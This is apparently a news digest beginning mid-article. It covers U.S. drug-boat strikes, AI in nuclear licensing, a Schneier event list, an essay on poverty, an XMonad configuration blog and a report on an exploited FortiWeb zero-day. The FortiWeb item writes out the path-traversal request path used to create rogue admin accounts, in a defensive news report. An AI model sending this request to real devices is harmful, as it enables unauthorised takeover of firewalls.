“For the United States to use military force in ‘self-defense’ against a non-state actor — as the government has asserted to Congress — or a state, the standard is whether we have suffered an ‘armed attack,’ in which case we may use force in self-defense to repel that attack. This is a term of art that has meaning. For example, the attacks of 9/11, the worst attacks on the homeland since Pearl Harbor, constituted the armed attack to which the U.S. responded in the conflict with al Qaeda,” said Ingber, now a law professor at Cardozo Law School in New York. “I’ve seen no evidence or even allegations that suggest there has been an armed attack on the United States. I’ve seen nothing to suggest that any of these alleged drug smugglers are acting as part of an organized armed group, or that they are involved in military-like hostilities with the United States, let alone prolonged hostilities.”

Experts say it’s unlikely that military personnel will face prosecution by a future administration for their roles in the extrajudicial killings of suspected drug smugglers that are covered by the OLC finding. “Legal advice, including an OLC opinion, itself does not provide ‘immunity’ per se,” Ingber told The Intercept. “But good faith reliance on it in this case would be a significant hurdle to prosecution.” Still, experts caution that there is no guarantee of absolute immunity.

A secret January 2002 OLC memo claimed that “customary international law cannot bind the executive branch under the Constitution,” empowering the George W. Bush administration, during the early days of the war on terror, to ignore the prohibition of torture under international law. “We conclude that customary international law, whatever its source and content, does not bind the President, or restrict the actions of the United States military,” it reads.

While Bush and top administration officials never faced legal consequences for the torture of detainees, low-level U.S. guards involved in the abuse of prisoners at Abu Ghraib prison in Iraq were court-martialed and convicted . A 2008 Senate Armed Services Committee report concluded “abuse of detainees at Abu Ghraib in late 2003 was not simply the result of a few soldiers acting on their own,” but that:

Secretary of Defense Donald Rumsfeld’s December 2, 2002 authorization of aggressive interrogation techniques and subsequent interrogation policies and plans approved by senior military and civilian officials conveyed the message that physical pressures and degradation were appropriate treatment for detainees in U.S. military custody. What followed was an erosion in standards dictating that detainees be treated humanely.

While U.S. civilian leaders and high-ranking U.S. officers routinely escape punishment for atrocities, not all top officials evade justice. During his first term in office, Trump regularly praised President Rodrigo Duterte of the Philippines and said he was doing an “unbelievable job on the drug problem.” Duterte’s government was, in fact, carrying out summary executions of suspected drug dealers. Duterte now faces charges of crimes against humanity at the International Criminal Court for his drug war.

Power Companies Are Using AI To Build Nuclear Power Plants

404 Media
www.404media.co
2025-11-14 17:28:04
Tech companies are betting big on nuclear energy to meet AI's massive power demands, and they're using that AI to speed up the construction of new nuclear power plants....
Original Article

Microsoft and nuclear power company Westinghouse Nuclear want to use AI to speed up the construction of new nuclear power plants in the United States. According to a report from think tank AI Now, this push could lead to disaster.

“If these initiatives continue to be pursued, their lack of safety may lead not only to catastrophic nuclear consequences, but also to an irreversible distrust within public perception of nuclear technologies that may inhibit the support of the nuclear sector as part of our global decarbonization efforts in the future,” the report said.

The construction of a nuclear plant involves a long legal and regulatory process called licensing that's aimed at minimizing the risks of irradiating the public. Licensing is complicated and expensive, but it has also largely worked, and nuclear accidents in the US are uncommon. But AI is driving demand for energy, and new players, mostly tech companies like Microsoft, are entering the nuclear field.

“Licensing is the single biggest bottleneck for getting new projects online,” a slide from a Microsoft presentation about using generative AI to fast track nuclear construction said. “10 years and $100 [million.]”

The presentation, which is archived on the website for the US Nuclear Regulatory Commission (the independent government agency that's charged with setting standards for reactors and keeping the public safe), detailed how the company would use AI to speed up licensing. In the company's conception, existing nuclear licensing documents and data about nuclear sites would be used to train an LLM that's then used to generate documents to speed up the process.

But the authors of the report from AI Now told 404 Media that they have major concerns about trusting nuclear safety to an LLM. “Nuclear licensing is a process, it’s not a set of documents,” Heidy Khlaaf, the head AI scientist at the AI Now Institute and a co-author of the report, told 404 Media. “Which I think is the first flag in seeing proposals by Microsoft. They don’t understand what it means to have nuclear licensing.”

“Please draft a full Environmental Review for new project with these details,” Microsoft’s presentation imagines as a possible prompt for an AI licensing program. The AI would then send the completed draft to a human for review, who would use Copilot in a Word doc for “review and refinement.” At the end of Microsoft’s imagined process, it would have “Licensing documents created with reduced cost and time.”

The Idaho National Laboratory, a Department of Energy-run nuclear lab, is already using Microsoft's AI to "streamline" nuclear licensing. "INL will generate the engineering and safety analysis reports that are required to be submitted for construction permits and operating licenses for nuclear power plants," INL said in a press release. Lloyd's Register, a UK-based maritime organization, is doing the same. American power company Westinghouse is marketing its own AI, called bertha, which promises to make the licensing process go from "months to minutes."

The authors of the AI Now report worry that using AI to speed up the licensing process will bypass safety checks and lead to disaster. “Producing these highly structured licensing documents is not this box-ticking exercise as implied by these generative AI proposals that we're seeing,” Khlaaf told 404 Media. “The whole point of the licensing process is to reason and understand the safety of the plant and to also use that process to explore the trade-offs between the different approaches, the architectures, the safety designs, and to communicate to a regulator why that plant is safe. So when you use AI, it's not going to support these objectives, because it is not a set of documents or agreements, which I think, you know, is kind of the myth that is now being put forward by these proposals.”

Sofia Guerra, Khlaaf’s co-author, agreed. Guerra is a career nuclear safety expert who has advised the U.S. Nuclear Regulatory Commission (NRC) and works with the International Atomic Energy Agency (IAEA) on the safe deployment of AI in nuclear applications. “This is really missing the point of licensing,” Guerra said of the push to use AI. “The licensing process is not perfect. It takes a long time and there’s a lot of iterations. Not everything is perfectly useful and targeted …but I think the process of doing that, in a way, is really the objective.”

Both Guerra and Khlaaf are proponents of nuclear energy, but worry that the proliferation of LLMs, the fast tracking of nuclear licenses, and the AI-driven push to build more plants is dangerous. “Nuclear energy is safe. It is safe, as we use it. But it’s safe because we make it safe and it’s safe because we spend a lot of time doing the licensing and we spend a lot of time learning from the things that go wrong and understanding where it went wrong and we try to address it next time,” Guerra said.

Law is another profession where people have attempted to use AI to streamline the process of writing complicated and involved technical documents. It hasn't gone well. Lawyers who have used AI to write legal briefs have been caught, over and over again, in court. AI-constructed legal arguments cite precedents that do not exist, hallucinate cases, and generally foul up legal proceedings.

Might something similar happen if AI was used in nuclear licensing? “It could be something as simple as software and hardware version control,” Khlaaf said. “Typically in nuclear equipment, the supply chain is incredibly rigorous. Every component, every part, even when it was manufactured is accounted for. Large language models make these really minute mistakes that are hard to track. If you are off in the software version by a letter or a number, that can lead to a misunderstanding of which software version you have, what it entails, the expectation of the behavior of both the software and the hardware and from there, it can cascade into a much larger accident.”

Khlaaf pointed to Three Mile Island as an example of an entirely human-made accident that AI may replicate. The accident was a partial nuclear meltdown of a Pennsylvania reactor in 1979. “What happened is that you had some equipment failure and design flaws, and the operators misunderstood what those were due to a combination of a lack of training…that they did not have the correct indicators in their operating room,” Khlaaf said. “So it was an accident that was caused by a number of relatively minor equipment failures that cascaded. So you can imagine, if something this minor cascades quite easily, and you use a large language model and have a very small mistake in your design.”

In addition to the safety concerns, Khlaaf and Guerra told 404 Media that using sensitive nuclear data to train AI models increases the risk of nuclear proliferation. They pointed out that Microsoft is asking not only for historical NRC data but for real-time and project specific data. “This is a signal that AI providers are asking for nuclear secrets,” Khlaaf said. “To build a nuclear plant there is actually a lot of know-how that is not public knowledge…what’s available publicly versus what’s required to build a plant requires a lot of nuclear secrets that are not in the public domain.”

Tech companies maintain cloud servers that comply with federal regulations around secrecy and are sold to the US government. Anthropic and the National Nuclear Security Administration traded information across an Amazon Top Secret cloud server during a recent collaboration, and it’s likely that Microsoft and others would do something similar. Microsoft’s presentation on nuclear licensing references its own Azure Government cloud servers and notes that it’s compliant with Department of Energy regulations. 404 Media reached out to both Westinghouse Nuclear and Microsoft for this story. Microsoft declined to comment and Westinghouse did not respond.

“Where is this data going to end up and who is going to have the knowledge?” Guerra told 404 Media.

💡

Do you know anything else about this story? I would love to hear from you. Using a non-work device, you can message me securely on Signal at +1 347 762-9212 or send me an email at matthew@404media.co.

Nuclear is a dual-use technology. You can use the knowledge of nuclear reactors to build a power plant or you can use it to build a nuclear weapon. The line between nukes for peace and nukes for war is porous. “The knowledge is analogous,” Khlaaf said. “This is why we have very strict export controls, not just for the transfer of nuclear material but nuclear data.”

Proliferation concerns around nuclear energy are real. Fear that a nuclear energy program would become a nuclear weapons program was the justification the Trump administration used to bomb Iran earlier this year. And as part of the rush to produce more nuclear reactors and create infrastructure for AI, the White House has said it will begin selling old weapons-grade plutonium to the private sector for use in nuclear reactors.

Trump’s done a lot to make it easier for companies to build new nuclear reactors and use AI for licensing. The AI Now report pointed to a May 23, 2025 executive order that seeks to overhaul the NRC. The EO called for the NRC to reform its culture, reform its structure, and consult with the Pentagon and the Department of Energy as it navigated changing standards. The goal of the EO is to speed up the construction of reactors and get through the licensing process faster.

A different May 23 executive order made it clear why the White House wants to overhaul the NRC. “Advanced computing infrastructure for artificial intelligence (AI) capabilities and other mission capability resources at military and national security installations and national laboratories demands reliable, high-density power sources that cannot be disrupted by external threats or grid failures,” it said.

At the same time, the Department of Government Efficiency (DOGE) has gutted the NRC. In September, members of the NRC told Congress they were worried they'd be fired if they didn't approve nuclear reactor designs favored by the administration. “I think on any given day, I could be fired by the administration for reasons unknown,” Bradley Crowell, a commissioner at the NRC, said in congressional testimony. He also warned that DOGE-driven staffing cuts would make it impossible to increase the construction of nuclear reactors while maintaining safety standards.

“The executive orders push the AI message. We’re not just seeing this idea of the rollback of nuclear regulation because we’re suddenly very excited about nuclear energy. We’re seeing it being done in service of AI,” Khlaaf said. “When you're looking at this rolling back of Nuclear Regulation and also this monopolization of nuclear energy to explicitly power AI, this raises a lot of serious concerns about whether the risk associated with nuclear facilities, in combination with the sort of these initiatives can be justified if they're not to the benefit of civil energy consumption.”

Matthew Wald, an independent nuclear energy analyst and former New York Times science journalist, is more bullish on the use of AI in the nuclear energy field. Like Khlaaf, he also referenced the accident at Three Mile Island. “The tragedy of Three Mile Island was there was a badly designed control room, badly trained operators, and there was a control room indication that was very easy to misunderstand, and they misunderstood it, and it turned out that the same event had begun at another reactor. It was almost identical in Ohio, but that information was never shared, and the guys in Pennsylvania didn't know about it, so they wrecked a reactor,” Wald told 404 Media.

"AI is helpful, but let’s not get messianic about it.”

According to Wald, using AI to consolidate government databases full of nuclear regulatory information could have prevented that. “If you've got AI that can take data from one plant or from a set of plants, and it can arrange and organize that data in a way that's helpful to other plants, that's good news,” he said. “It could be good for safety. It could also just be good for efficiency. And certainly in licensing, it would be more efficient for both the licensee and the regulator if they had a clearer idea of precedent, of relevant other data.”

He also said that the nuclear industry is full of safety-minded engineers who triple check everything. “One of the virtues of people in this business is they are challenging and inquisitive and they want to check things. Whether or not they use computers as a tool, they’re still challenging and inquisitive and want to check things,” he said. “And I think anybody who uses AI unquestionably is asking for trouble, and I think the industry knows that…AI is helpful, but let’s not get messianic about it.”

But Khlaaf and Guerra are worried that the framing of nuclear power as a national security concern and the embrace of AI to speed up construction will set back public acceptance of nuclear power. If nuclear isn't safe, it's not worth doing. “People seem to have lost sight of why nuclear regulation and safety thresholds exist to begin with. And the reason why nuclear risks, or civilian nuclear risk, were ever justified was due to the capacity for nuclear power to provide flexible civilian energy demands at low-cost emissions in line with climate targets,” Khlaaf said.

“So when you move away from that…and you pull in the AI arms race into this cost benefit justification for risk proportionality, it leads government to sort of over index on these unproven benefits of AI as a reason to have nuclear risk, which ultimately undermines the risks of ionizing radiation to the general population, and also the increased risk of nuclear proliferation, which happens if you were to use AI like large language models in the licensing process.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Matthew Gault

Germany to Ban Huawei from Future 6G Network in Sovereignty Push

Hacker News
www.bloomberg.com
2025-11-14 17:19:08
Comments...
Original Article

Upcoming Speaking Engagements

Schneier
www.schneier.com
2025-11-14 17:08:57
This is a current list of where and when I am scheduled to speak: My coauthor Nathan E. Sanders and I are speaking at the Rayburn House Office Building in Washington, DC at noon ET on November 17, 2025. The event is hosted by the POPVOX Foundation and the topic is “AI and Congress: Practical Steps ...
Original Article

This is a current list of where and when I am scheduled to speak:

  • My coauthor Nathan E. Sanders and I are speaking at the Rayburn House Office Building in Washington, DC at noon ET on November 17, 2025. The event is hosted by the POPVOX Foundation and the topic is “AI and Congress: Practical Steps to Govern and Prepare.”
  • I’m speaking on “Integrity and Trustworthy AI” at North Hennepin Community College in Brooklyn Park, Minnesota, USA, on Friday, November 21, 2025, at 2:00 PM CT. The event is cohosted by the college and The Twin Cities IEEE Computer Society.
  • Nathan E. Sanders and I will be speaking at the MIT Museum in Cambridge, Massachusetts, USA, on December 1, 2025, at 6:00 pm ET.
  • Nathan E. Sanders and I will be speaking at a virtual event hosted by City Lights on the Zoom platform, on December 3, 2025, at 6:00 PM PT.
  • I’m speaking and signing books at the Chicago Public Library in Chicago, Illinois, USA, on February 5, 2026. Details to come.

The list is maintained on this page.

You misunderstand what it means to be poor

Hacker News
blog.ctms.me
2025-11-14 17:08:15
Comments...
Original Article

The more I speak about being poor, the more I realize how fundamentally other folks misunderstand what it means to be poor versus being broke. The advice folks will give comes from a good place. However, I would like to give some examples to help everyone understand why most advice from non-poor folks isn’t helpful.

Everyone has experienced being broke. Being broke sucks. You are watching every dollar spent, finding ways to trim or make things stretch until the next payday. The difference is when you are broke you have some money. You can afford to put gas in your car, but not enough to do that repair. Money is tight, but you can get the basics at the grocery store. You can’t afford to go to the movies, but will stay home and watch what’s new on Netflix.

When you are poor that next payday brings no relief. It is like an endless runner game. No matter how fast you run or how high you jump you can never see the finish line. No matter how tired you are the ground keeps moving. There is no room for errors as the punishment for mistakes is astronomical. When you hit an obstacle you don’t restart from the last checkpoint, you go back to the beginning.

There is this mindset from folks that poor people must not be smart. I mean, you’re smart and you’re not poor! The problem must be a skill issue! Learn the skills to do it yourself and you’ll be able to pull yourself up.

The other mindset is poor people are lazy. Quit complaining and do it yourself! Just get a better job! Get a second job! There’s money out there, you just have to go get it.

The last is these folks think they understand what it is like to be poor. Hey, I was a broke college student and I get being poor! I had a rough patch, it will pass.

Let’s start at the top.

I have a van that is falling apart. It needs a lot of work that we cannot afford to do. In the mindset that poor people are unskilled, it appears that I should watch some YouTube videos, get the parts, and do it myself. The misunderstanding is that being poor means you have tons and tons of skills. You have to fix everything yourself. There is never, I mean never, a time you can pay someone to fix it for you.

In this example folks think, “If the repair at the shop costs $1,000, but the parts cost $300, you can save a lot of money doing it yourself.” You are absolutely correct. Yet, I still need to be able to afford the $300 in parts.

Do you see the misunderstanding? I can’t make $300 appear out of thin air. I have the skills, I’ve had to fix all my cars myself. I’ve done complete engine rebuilds, I’ve replaced transmissions, I do all my own regular maintenance. The problem isn’t skills, it’s money. When you are broke, spending $300 instead of $1,000 sounds like a win because you can’t afford the $1,000. When you’re poor $300 might as well be $1,000 or $10,000, you will never afford it.

This is not a matter of time, either. I can’t put aside money each month and then get it. There is never money to put aside. I can’t put it on the credit card as I know I will never be able to pay it. I’ll just have this $300 debt looming over me, increasing with interest every month, mocking how much of a loser I am.

The second mindset: Being lazy.

How do I have the time to work multiple jobs when I’m doing all this extra work? How do I have the time when in my extra time I’m fixing cars, appliances, the roof, and cooking every meal from scratch?

Should I work a second job and never see my wife? My kids? Should I never have any personal time? Should my entire life revolve around money? Should I kill myself for capitalism?

Folks who say things like this have only ever experienced being broke. It is a temporary situation and a few months of extra income will solve the problem. Being poor is not missing $1,000 or $10,000 in the short term. It’s missing $40,000 a year, every year, forever. There is no short term relief. This isn’t a rough patch. It is The Pit in The Dark Knight Rises.

“There’s a reason why this prison is the worst hell on earth… Hope. Every man who has rotted here over the centuries has looked up to the light and imagined climbing to freedom. So easy… So simple… And like shipwrecked men turning to sea water from uncontrollable thirst, many have died trying. I learned here that there can be no true despair without hope.”

Yes, it is possible to escape. Hell, two people have done it! Why can’t you do it! But you are completely ignoring how many people have fallen to their death trying.

All of the general guidance to escape being poor is actually advice for getting through being broke.

  • Cancel Netflix
  • Make food at home
  • Stop going to Starbucks
  • Fix it yourself
  • Don’t upgrade your phone

These are all things that will help you temporarily. It will help you get through a short period of being broke. Or it will help you get your spending under control. You have enough money, you just don’t spend it wisely.

Being poor is you already did all those things. You cancelled all your streaming services years ago. You make all your food from scratch all the time. You never go to fucking Starbucks. You fix everything yourself. You already stretch everything to the limit. That is how you have to live every day of your life, for eternity, with no relief in sight.

One last example, and it is pertinent to our times in the US. A lot of poor folks are having to stand in line for hours and hours to get food at a food bank due to government ineptitude. The advice to simply cook at home doesn’t fix that there isn’t any food at home.

Do you honestly think people standing in line at a food bank could fix their situation if they stopped getting DoorDash? Going to Starbucks? Fuck off. They weren’t doing that already.

How are they to get another job or put in extra hours if they have to stand in line for 3 hours to get food? Should they go without food until they get that job and the paycheck?

You need to step aside and think about the differences between being broke and being poor.

- - - - -

Thank you for reading! If you would like to comment on this post you can start a conversation on the Fediverse. Message me on Mastodon at @cinimodev@masto.ctms.me . Or, you may email me at blog.discourse904@8alias.com . This is an intentionally masked email address that will be forwarded to the correct inbox.

Moving Back to a Tiling WM – XMonad

Hacker News
wssite.vercel.app
2025-11-14 17:04:49
Comments...
Original Article

Here are my dotfiles.

When I was still using Manjaro Linux back in 2019, I got a nudge to try i3wm. It was my first experience with any window manager, and I spent nearly 5 years with it, enjoying the absolute control over my workflow. Nearing the end of 2023, when I finally decided to leave Manjaro (for good), I had a bunch of options at hand. Fedora looked really promising at the time, but even then, I wasn’t sure I was going to keep using a tiling window manager. I happily switched to Gnome in Fedora 40. I ran it along with XOrg so that I could make my capslock key act as a ctrl when held and as an escape when pressed once, using setxkbmap and xcape. But after only a few months there, I realized I missed that finer control at my fingertips. So I resumed searching for a newer tiling window manager. I was also learning Haskell at the time, so picking up XMonad was natural.

XMonad Fastfetch

There are a lot of things I like about XMonad apart from its standard tiling window manager features. I enjoy writing the configuration in Haskell. Wherever possible, I try to leverage the benefits of Haskell’s strong type system; defining keybindings with it ensures that I cannot go very wrong. Using stack to build my configuration lets me port the entire configuration easily to other systems, such as my various virtual machines. I have split the configuration into various modules.

src
├── Keybindings.hs
├── Layout.hs
├── Plugins
│   ├── Bluetooth.hs
│   ├── Pomodoro.hs
│   └── Soundtrack.hs
├── Preferences.hs
├── Theme
│   ├── Dmenu.hs
│   ├── Font.hs
│   ├── Theme.hs
│   └── Xresources.hs
├── Workspaces.hs
├── xmobar.hs
└── xmonad.hs

3 directories, 13 files

If you want to poke around the config according to your needs, go through Preferences.hs . It contains lots of variables which can be customized like terminal emulator, browser, scratchpads, window gap size etc. It also contains a list of applications which you would like to start automatically at boot.

Overall, the modularization has turned out to be pretty handy for categorizing things. I tried writing a few xmobar plugins for my own needs; the guide for writing them was straightforward to follow. I also wrote my entire xmobar configuration in Haskell itself, keeping that executable in the same project. In the end, the project became a one-shot way to get an entire desktop environment which I can easily clone, compile, and install on any system.

1. Setup

I will go briefly over the stack-based setup. The only thing needed is to have a build script at the root of your xmonad project. Everything else is simply a normal stack project with modules and a few executables. I have 2 executables in my project: xmonad and xmobar.

A detailed description and example build files can be found here. My build script is simple enough.

#!/bin/sh
# Custom build script picked up by xmonad: compile the stack project and
# hard-link the resulting binary to the output path xmonad passes in as $1.

SRC_DIR=$HOME/.config/xmonad
WM=xmonad

unset STACK_YAML    # make sure stack resolves the project's own stack.yaml
FAIL=0

cd $SRC_DIR
stack install 2>.log || FAIL=1

ln -f -T $(stack exec -- which $WM) $1 2>.log || FAIL=2

2. Installation

XMonad Workflow

Stack is a package manager for Haskell projects and it will be used to compile the package. Install stack either via GHCup or your distribution’s package manager.

mkdir -p $HOME/.config/xmonad
git clone --branch release https://github.com/weirdsmiley/xmonad $HOME/.config/xmonad/
cd $HOME/.config/xmonad
./install.sh

The installation script will install a few fonts and other tools which are default for this setup. It will also write .xinitrc and .Xresources files.

After the installation is complete, and you are logged into xmonad, pressing alt+shift+/ or alt+? will open up a dialog box containing all available keybindings.

3. Diving in

3.1. Layouts and per-workspace layouts

XMonad provides a very easy way to describe the layouts each workspace can follow. I found it useful to constrain each workspace to only a few layouts, using PerWorkspace. This lets me switch between just the specified set of layouts. For example, workspace 2 is my writing workspace, in which I have three applications: a browser, a PDF reader, and a terminal with a tmux session attached to it. This can simply be arranged as a three-column layout. But some PDFs have a small font size, which can be tough to read in a column. If I zoom in, the PDF spills sideways, and I have to use the arrow keys or h,l to move left and right.

Three column layout

To tackle this, I have another layout with added magnification on top of the three-column layout. It magnifies the focused window by a set factor. Having only these two layouts in my layout set makes cycling between them easy; I don’t have to skip through four different layouts I would never use in this workspace.

Three column layout with magnification
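
For reference, here is a minimal, illustrative sketch of this kind of per-workspace layout set, using onWorkspace from XMonad.Layout.PerWorkspace together with ThreeColumns and Magnifier. The workspace name and the magnification factor below are placeholders, not necessarily the values used in Layout.hs.

import XMonad
import XMonad.Layout.Magnifier (magnifiercz)
import XMonad.Layout.PerWorkspace (onWorkspace)
import XMonad.Layout.ThreeColumns (ThreeCol (ThreeColMid))

-- Workspace "2" cycles only between a three-column layout and a magnified
-- variant of it; every other workspace falls back to the usual Tall/Full pair.
myLayoutHook = onWorkspace "2" writingLayouts defaultLayouts
  where
    threeCol = ThreeColMid 1 (3 / 100) (1 / 3) -- master window in the middle column
    writingLayouts = threeCol ||| magnifiercz 1.3 threeCol
    defaultLayouts = Tall 1 (3 / 100) (1 / 2) ||| Full

main :: IO ()
main = xmonad def { layoutHook = myLayoutHook }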

3.2. Topbar modification

By default, XMonad adds a border to the tiled window that is in focus. I took this idea from here: it adds a title bar with formatted colors, which looks nicer than a border surrounding the window. The focused window’s bar is colored blue while unfocused ones are black. Having the title names in the topbar also looks nice and, in a way, removes the need to use XMonadLog’s application names in xmobar itself.

Window topbar

Window topbar unfocused
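
This kind of per-window title bar is usually built with a decoration layout modifier; below is a minimal, illustrative sketch using noFrillsDeco from xmonad-contrib. The colors and bar height are placeholder values, not the actual theme from Theme/Theme.hs.

import XMonad
import XMonad.Layout.Decoration (Theme (..), shrinkText)
import XMonad.Layout.NoFrillsDecoration (noFrillsDeco)

-- A plain title bar on every window, colored by focus state:
-- blue when focused, black otherwise.
topBarTheme :: Theme
topBarTheme =
  def
    { activeColor = "#268bd2"
    , activeBorderColor = "#268bd2"
    , activeTextColor = "#ffffff"
    , inactiveColor = "#000000"
    , inactiveBorderColor = "#000000"
    , inactiveTextColor = "#888888"
    , decoHeight = 18
    }

main :: IO ()
main =
  xmonad
    def
      { layoutHook = noFrillsDeco shrinkText topBarTheme (Tall 1 (3 / 100) (1 / 2))
      , borderWidth = 0 -- the title bar replaces the usual focus border
      }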

3.3. Type safety in keybindings

This is something which I truly adore about XMonad and writing its configuration in Haskell. I can write my keybindings in a functional manner and leverage Haskell’s type system to ensure safety. Arranging keybindings in this way seems more fruitful than representing them via strings.

myKeys :: XConfig Layout -> M.Map (KeyMask, KeySym) (X ())
myKeys conf@XConfig {XMonad.modMask = modm} =
  M.fromList -- list of keybindings
    $ [
      -- Restart XMonad
      ( (modm, xK_q), safeSpawn "xmonad" ["--restart"])
      -- Toggle fullscreen
      , ((modm, xK_f), sendMessage $ Toggle NBFULL)
      -- Lock screen
      , ((modm, xK_l), unGrab *> safeSpawn "env" myLockscreen)
      ]

Each keybinding is composed of a (KeyMask, KeySym) pair, followed by an X () action. If you don’t want to set a keymask, simply pass 0 or noModMask.

3.4. Submap keybindings and makeChords

Using submaps in xmonad-contrib, I can write a utility function to easily generate a set of keybindings with an added description.

import XMonad.Actions.Submap
import qualified Data.Map as M

makeChords :: a -> [((KeyMask, KeySym), String, X ())] -> [(a, X ())]
makeChords majorKey subKeys =
  (majorKey, submap . M.fromList $ map (\(k, _, a) -> (k, a)) subKeys)
    : [ ( majorKey
        , visualSubmap myVisualSubmapDef
            $ M.fromList
            $ map (\(k, d, a) -> (k, (d, a))) subKeys)
      ]

soundChords modm =
  makeChords
    (modm, xK_a)
    [ ( (0, xK_a), "open alsamixer"
      , spawn $ myNamedTerminal "alsamixer" ++ " -e alsamixer")
    , ( (0, xK_m), "toggle music playing"
      , getRunningPlayer' >>= \player ->
          spawn $ myMusicCtrl ++ " -p \"" ++ player ++ "\" play-pause")
    ]

myKeys conf@XConfig {XMonad.modMask = modm} =
  M.fromList $ [] ++ soundChords modm

makeChords adds two distinct sets of keybindings: a normal set and a visual set, which creates a dialog box when you press the main submap key. In the example above, the soundChords submap is enabled with alt+a, after which a dialog box shows the two keybindings with their descriptions. Pressing either a or m launches the first or the second action. The documentation also contains an example which you can read to see the actual code that will be appended to your myKeys.

My visual submap for soundChords

3.5. Xmobar configuration in Haskell

Writing the Xmobar configuration inside the same project really allows me to keep everything in one place. I create another executable alongside the xmonad executable, in my package.yaml. And then xmonad launches xmobar in the startup apps section.

executables:
  xmonad:
    main: xmonad.hs
    dependencies:
      - xmonad
      - xmonad-contrib
      - containers
  xmobar:
    main: xmobar.hs
    dependencies:
      - xmobar
    ghc-options: -rtsopts -threaded -with-rtsopts=-N

You may have noticed a small icon beside my workspace icons on the left side of xmobar. It represents the current layout in a visual form. Try switching layouts with alt+space and see the icon change.

xmobar

myXmobarPP =
  def
    { ppLayout =
        \case
          "Columns" -> "<icon=Columns.xpm/>"
          "MagnifiedColumns" -> "<icon=MagnifiedColumns.xpm/>"
          "Full" -> "<icon=Full.xpm/>"
          "Tall" -> "<icon=Tall.xpm/>"
          "ThreeCol" -> "<icon=MagnifiedColumns.xpm/>"
          "2-by-3 (left)" -> "<icon=TwoByThreeLeft.xpm/>"
          "2-by-3 (right)" -> "<icon=TwoByThreeRight.xpm/>"
          "2x3 LT" -> "<icon=TwoByThreeLeftWithTabs.xpm/>"
          "2x3 RT" -> "<icon=TwoByThreeRightWithTabs.xpm/>"
          "Tiled" -> "<icon=Tiled.xpm/>"
          _ -> "<icon=Unknown.xpm/>"
    }

main =
  xmonad
    . withEasySB (statusBarProp "xmobar" (pure myXmobarPP)) defToggleStrutsKey
    $ myConfig

3.6. Scratchpads in action

I am using 4 scratchpads in total. Each scratchpad is mapped to a keybinding.

  [
  -- Open Scratchpad
  ((modm, xK_Return), namedScratchpadAction myScratchpads "terminal")
  -- Open Kanboard session
  , ((modm, xK_x), namedScratchpadAction myScratchpads "Kanboard")
  -- Open CalibreWeb
  , ((modm, xK_z), namedScratchpadAction myScratchpads "CalibreWeb")
  -- Open Anki
  , ((modm, xK_m), namedScratchpadAction myScratchpads "Anki")
  ]

myScratchpads =
  [ NS "terminal" spawnTerm findTerm manageTerm
  , NS "Kanboard" spawnKanboard (className =? "Kanboard") doFullFloat
  , NS "Anki" spawnAnki (className =? "Anki") doFullFloat
  , NS "CalibreWeb" spawnCalibreWeb (className =? "CalibreWeb") doFullFloat
  ]
  ...
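
The spawn, find, and manage helpers are elided above; here is a sketch of what the terminal ones typically look like, and how the list plugs into the manageHook. The terminal command, window title, and float geometry are assumptions, not the actual definitions from the dotfiles.

import XMonad
import XMonad.Util.NamedScratchpad (NamedScratchpad (NS), customFloating, namedScratchpadManageHook)
import qualified XMonad.StackSet as W

spawnTerm :: String
spawnTerm = "alacritty --title scratchpad" -- assumed terminal; any emulator with a title flag works

findTerm :: Query Bool
findTerm = title =? "scratchpad"

manageTerm :: ManageHook
manageTerm = customFloating $ W.RationalRect (1 / 6) (1 / 6) (2 / 3) (2 / 3)
-- float the scratchpad centred, at two thirds of the screen size

myScratchpads :: [NamedScratchpad]
myScratchpads = [NS "terminal" spawnTerm findTerm manageTerm]
-- plus the Kanboard, CalibreWeb, and Anki entries in the same shape

main :: IO ()
main = xmonad def { manageHook = namedScratchpadManageHook myScratchpads <+> manageHook def }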

I realized that I don’t really open new terminals that often because I use tmux (with tmux-resurrect and tmux-continuum). So I remapped alt+enter to show the terminal scratchpad instead of opening a new terminal as usual.

I can open up the calibre-web instance with alt+z, and immediately resume whatever I was reading.

Calibre-Web gif

If you have any questions for me, head over to this discussion page.

Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 17:00:42
Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited. [...]...
Original Article

Fortinet

Fortinet has confirmed that it has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now "massively exploited in the wild."

The announcement follows reports of unauthenticated attackers exploiting an unknown FortiWeb path traversal flaw to create new administrative users on Internet-exposed devices.

The attacks were first identified by threat intel firm Defused on October 6, which published a proof-of-concept exploit and reported that an "unknown Fortinet exploit (possibly a CVE-2022-40684 variant)" is being used to send HTTP POST requests to the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi Fortinet endpoint to create local admin-level accounts.

On Thursday, watchTowr Labs security researchers also demoed an exploit and released a tool called "FortiWeb Authentication Bypass Artifact Generator" to help defenders identify vulnerable devices.

Cybersecurity firm Rapid7 added that the flaw affects FortiWeb versions 8.0.1 and earlier, as it confirmed that the publicly available proof-of-concept exploit no longer works after updating to version 8.0.2.

Today, Fortinet disclosed that attackers are actively exploiting a path confusion vulnerability (now tracked as CVE-2025-64446) in FortiWeb's GUI component, which allows unauthenticated attackers to execute administrative commands on unpatched systems via crafted HTTP or HTTPS requests.

"Fortinet has observed this to be exploited in the wild," the company noted in a Friday security advisory , which confirmed that the zero-day has been silently patched in FortiWeb 8.0.2, released on October 28, three weeks after Defused's first report that the CVE-2025-64446 security flaw was being exploited in attacks.

Version      | Affected              | Solution
FortiWeb 8.0 | 8.0.0 through 8.0.1   | Upgrade to 8.0.2 or above
FortiWeb 7.6 | 7.6.0 through 7.6.4   | Upgrade to 7.6.5 or above
FortiWeb 7.4 | 7.4.0 through 7.4.9   | Upgrade to 7.4.10 or above
FortiWeb 7.2 | 7.2.0 through 7.2.11  | Upgrade to 7.2.12 or above
FortiWeb 7.0 | 7.0.0 through 7.0.11  | Upgrade to 7.0.12 or above

Federal agencies ordered to patch within a week

CISA also added the CVE-2025-64446 path traversal flaw to its catalog of actively exploited vulnerabilities on Friday, ordering U.S. federal agencies to patch their systems by November 21.

"This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise," the cybersecurity agency warned.

Admins who can't immediately upgrade to FortiWeb 8.0.2 should disable HTTP or HTTPS for all internet-facing management interfaces and ensure that access is restricted to trusted networks.

